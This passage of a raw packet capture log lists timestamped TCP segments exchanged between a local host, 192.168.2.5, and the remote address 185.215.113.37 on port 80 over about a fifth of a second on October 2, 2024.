Oct 2, 2024 23:10:11.176800966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.176815987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.176842928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.176887035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.177786112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.177802086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.177814960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.177829981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.177844048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.177882910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.178566933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.178582907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.178596973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.178622961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.178657055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.179394960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.179410934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.179425001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.179451942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.179483891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.180466890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.180483103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.180495977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.180510044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.180522919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.180558920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.181386948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.181401014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.181413889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.181443930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.181457043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.182024002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.182039976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.182053089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.182077885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.182101011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.182703972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.182718992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.182732105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.182746887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.182763100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.182781935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.183326006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183341026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183355093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183368921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183379889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.183423042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.183885098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183900118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183934927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183939934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.183948994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183964014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.183973074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.184009075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.185282946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.185298920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.185312033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.185324907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.185339928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.185374975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.187596083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.187611103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.187624931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.187638998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.187653065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.187825918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.189292908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.189326048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.189356089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.189357042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.189388037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.189392090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.189407110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.189424038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.189440012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.189474106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.264745951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.264823914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.265093088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.265130043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.265152931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.265180111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.265732050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.265748024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.265762091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.265789986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.265827894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.270236015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.270251989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.270266056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.270298958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.270330906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.271199942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.271215916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.271230936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.271245956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.271260023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.271285057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.271322012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.275083065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.275099039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.275115013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.275146008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.275175095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.275821924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.275836945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.275851965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.275878906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.275913954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.279247999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.279263973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.279278994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.279294014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.279304981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.279345036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.280138969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.280154943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.280168056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.280193090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.280227900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.283495903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.283512115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.283525944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.283552885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.283587933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.285573006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.285588980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.285603046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.285618067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.285624027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.285667896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.286909103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.286923885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.286937952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.286962986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.286998034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.291467905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.291501999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.291529894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.291533947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.291563988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.291587114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.291826010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.291860104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.291883945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.291892052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.291909933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.291924953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.291941881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.291974068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.296246052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.296278954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.296303988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.296310902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.296329021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.296361923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.296710014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.296760082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.296770096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.296794891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.296812057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.296844959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.300682068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.300736904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.300745010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.300765991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.300781965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.300795078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.300807953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.300837040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.301480055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.301507950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.301532030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.301532984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.301553011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.301582098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.305089951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.305130959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.305145025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.305155993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.305172920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.305196047 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.305412054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.305438995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.305459976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.305463076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.305484056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.305490971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.305511951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.305531979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.308974981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309003115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309025049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309027910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309050083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309068918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309123039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309149027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309165955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309186935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309194088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309221983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309238911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309247017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309274912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309288025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309777021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309802055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309823036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309827089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309848070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309849977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309870958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309875965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.309895039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.309919119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.312818050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.312844992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.312870979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.312872887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.312894106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.312896967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.312916040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.312922955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.312941074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.312963009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.313124895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.313153982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.313173056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.313194036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.313199043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.313235998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.313240051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.313280106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315359116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315398932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315412998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315428972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315444946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315459967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315469027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315475941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315510035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315534115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315725088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315778017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315778971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315792084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315809011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315823078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.315824986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315855980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.315897942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.317650080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.317665100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.317677975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.317692041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.317706108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.317745924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.318310022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.318324089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.318336964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.318351030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.318363905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.318366051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.318387032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.318453074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.319861889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.319875956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.319889069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.319902897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.319922924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.319947004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.320278883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.320295095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.320307016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.320322990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.320336103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.320353985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.320390940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.381608009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.381710052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.381750107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.381807089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.381834030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.381839991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.381871939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.381871939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.381922007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.381943941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.381973982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.382584095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.382600069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.382612944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.382627964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.382652044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.382684946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.383372068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.383399963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.383414030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.383434057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.383510113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.384232998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.384247065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.384259939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.384274960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.384294033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.384309053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.384344101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.385090113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.385104895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.385118008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.385130882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.385145903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.385163069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.385195971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.385814905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.385829926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.385843992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.385868073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.385890961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.386707067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.386720896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.386734009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.386766911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.386779070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 2, 2024 23:10:11.387494087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.387507915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.387521029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.387536049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 2, 2024 23:10:11.387551069 CEST	49704	80	192.168.2.5	185.215.113.37
